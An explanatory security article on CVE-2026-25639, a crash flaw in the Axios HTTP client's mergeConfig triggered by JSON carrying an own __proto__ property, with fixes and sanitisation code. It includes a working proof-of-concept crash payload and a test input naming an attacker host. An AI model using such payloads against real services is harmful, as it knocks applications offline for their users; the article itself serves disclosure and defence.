Axios is a top-tier HTTP client widely used in both front-end and back-end JavaScript and Node.js projects. Its promise-based API, flexibility, and ease of use have made it a favorite choice for sending HTTP requests. However, a dangerous vulnerability (CVE-2026-25639) lurks in Axios versions prior to 0.30.3 and 1.13.5, and it can be easily exploited to crash any application that relies on Axios.
In this exclusive long read, let’s break down what CVE-2026-25639 is about, how it can be triggered, and how you can mitigate it.
What Is CVE-2026-25639?
CVE-2026-25639 is a vulnerability in the mergeConfig function of Axios. This function is supposed to merge two configuration objects (imagine two sets of settings for how requests should work) in a safe manner before making an HTTP request.
But prior to Axios version 0.30.3 (for the 0.x line) and 1.13.5 (for the 1.x line), this function crashes with a JavaScript TypeError when processing a configuration object that explicitly contains an __proto__ property—set as its own property, not just something inherited from the prototype chain.
Here’s why this is dangerous
- Simple payload: Anyone who can send or control your Axios configs (maybe via a REST API or user-supplied JSON) can trigger this.
- Complete denial of service (DoS): The process crashes, its job is stopped dead, potentially taking down servers or browser apps.
- Easy to reproduce: This is a logic flaw related to how plain objects and prototypes work in JavaScript. No need for fancy attacks or shell access.
Why Is __proto__ Special?
In JavaScript, every object inherits properties and methods from a prototype. The special property __proto__ allows access to an object’s prototype directly.
Malicious input like
{
  "__proto__": {
    "evil": "data"
  }
}
can “poison” the object’s prototype chain if not handled carefully. Most modern code (and many libraries) protect against this, but old or careless code sometimes doesn’t. Axios tried to do this, but its earlier mergeConfig logic didn’t fully account for situations where __proto__ appears as a direct (own) property.
Exploit Details: How Attackers Crash Axios Apps
Suppose your server-side code receives arbitrary JSON, parses it, and uses it as Axios request config. Here’s all it takes:
const axios = require('axios'); // vulnerable version (before 0.30.3 / 1.13.5)
// Untrusted JSON (e.g. a request body) parsed straight into an object:
const userInput = '{ "__proto__": {} }';
const configObject = JSON.parse(userInput); // now carries an *own* __proto__ property
axios.get('https://example.com', configObject); // mergeConfig runs on this object
// Application will crash with:
// TypeError: Cannot convert undefined or null to object
Key issue: The mergeConfig function stumbles when it tries to copy or merge properties from a config object with an own __proto__ property. This throws a TypeError, immediately bringing down the program.
Sample Proof of Concept (PoC)
const axios = require('axios'); // vulnerable version, e.g. 1.13.4 installed with npm
const maliciousConfig = JSON.parse('{"__proto__":{}}'); // own __proto__ property
try {
  axios.get('https://api.github.com', maliciousConfig)
    .then(response => console.log(response.data))
    .catch(console.error); // on the 1.x line the TypeError arrives as a rejected promise
} catch (e) {
  console.error('Axios crashed:', e); // on the 0.x line mergeConfig throws synchronously here
}
You’ll see an error like
TypeError: Cannot convert undefined or null to object
Real-World Impact
If you’re running a Node.js server, exposing APIs that call other APIs with user-defined settings, any unauthenticated user could crash your app. Similarly, desktop and mobile Electron apps, or even browser-side JavaScript, are at risk if external data is passed unsafely to Axios.
NPM/Yarn fix example
npm install axios@latest
# or for the 0.x line:
npm install axios@0.30.3
Extra precautions
- Always sanitize user input. Never pass user-controlled objects to HTTP libraries as options/configs.
- Use Object.create(null) if you’re building config objects from scratch, to avoid accidental prototype pollution.
- Use tools like npm audit or Snyk to monitor packages for known vulnerabilities.
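The first two precautions combined, as an added example that is not part of Axios or of the original post: untrusted JSON is parsed with a reviver that drops __proto__ (and the related constructor/prototype keys), deep-copied into Object.create(null) objects, and reduced to an allow-list of request options before anything reaches axios.get(). The allow-list (ALLOWED_OPTIONS) is an assumption chosen for this example; the helpers use only Node built-ins.

```javascript
// Added example, not Axios's own code: turn untrusted JSON into request options
// that are safe to pass to axios.get()/mergeConfig().

// Keys that must never arrive as *own* properties of a config object.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
// Assumed allow-list of top-level options a caller may set (example-specific).
const ALLOWED_OPTIONS = new Set(['headers', 'params', 'timeout', 'responseType']);

// Step 1: JSON.parse reviver. Returning undefined for a key deletes it, so a
// "__proto__" member never becomes an own property of the parsed object.
function parseUntrustedJson(text) {
  return JSON.parse(text, (key, value) => (FORBIDDEN_KEYS.has(key) ? undefined : value));
}

// Step 2: deep-copy plain data into null-prototype objects (belt and braces:
// forbidden keys are skipped again here, so this also works on already-parsed input).
function toNullProtoDeep(value) {
  if (Array.isArray(value)) return value.map(toNullProtoDeep);
  if (value === null || typeof value !== 'object') return value;
  const out = Object.create(null);
  for (const key of Object.keys(value)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    out[key] = toNullProtoDeep(value[key]);
  }
  return out;
}

// Step 3: keep only the options the application intends to expose.
function buildRequestConfig(text) {
  const raw = toNullProtoDeep(parseUntrustedJson(text));
  const config = Object.create(null);
  for (const key of Object.keys(raw)) {
    if (ALLOWED_OPTIONS.has(key)) config[key] = raw[key];
  }
  return config;
}

// Detection helper: does a value carry a forbidden key as an own property anywhere?
// Useful for logging/alerting on payloads that would have hit the mergeConfig crash.
function hasForbiddenOwnKey(value) {
  if (value === null || typeof value !== 'object') return false;
  for (const key of Object.getOwnPropertyNames(value)) {
    if (FORBIDDEN_KEYS.has(key)) return true;
    if (hasForbiddenOwnKey(value[key])) return true;
  }
  return false;
}

module.exports = { parseUntrustedJson, toNullProtoDeep, buildRequestConfig, hasForbiddenOwnKey };
```

Constructed payload for a quick check: '{"__proto__":{"evil":"data"},"headers":{"X-Id":"1"},"baseURL":"http://attacker.invalid"}' yields a config that has no own __proto__, keeps headers, and drops baseURL.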
Conclusion
Axios is everywhere—this bug is a reminder to always keep dependencies updated, especially when they’re core modules like HTTP clients. CVE-2026-25639 is easy to trigger and can bring down your critical apps. Patch now, and audit your use of config objects for third-party libraries.
Timeline
Published on: 02/09/2026 20:11:22 UTC
Last modified on: 02/18/2026 18:24:34 UTC